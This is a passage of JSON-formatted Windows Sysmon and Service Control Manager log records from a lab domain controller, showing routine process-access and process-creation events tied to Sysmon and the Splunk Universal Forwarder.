DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2239,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2240,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2241,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2242,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2243,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2244,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:29.314\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F79-5F25-0000-0010330C0400}\r\nTargetProcessId: 4048\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:29.314","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F79-5F25-0000-0010330C0400}","TargetProcessId":"4048","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76829,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The SplunkForwarder service entered the running state.","param1":"SplunkForwarder","param2":"running","EventReceivedTime":"2020-08-01 07:53:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2245,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.242\r\nProcessGuid: {41C8662E-1F7A-5F25-0000-001038160400}\r\nProcessId: 3808\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nFileVersion: 8.0.2\r\nDescription: Remote Performance monitor using WMI\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-wmi.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.242","ProcessGuid":"{41C8662E-1F7A-5F25-0000-001038160400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","FileVersion":"8.0.2","Description":"Remote Performance monitor using WMI","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-wmi.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2246,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:30.408\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F7A-5F25-0000-001038160400}\r\nTargetProcessId: 3808\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:30.408","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F7A-5F25-0000-001038160400}","TargetProcessId":"3808","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
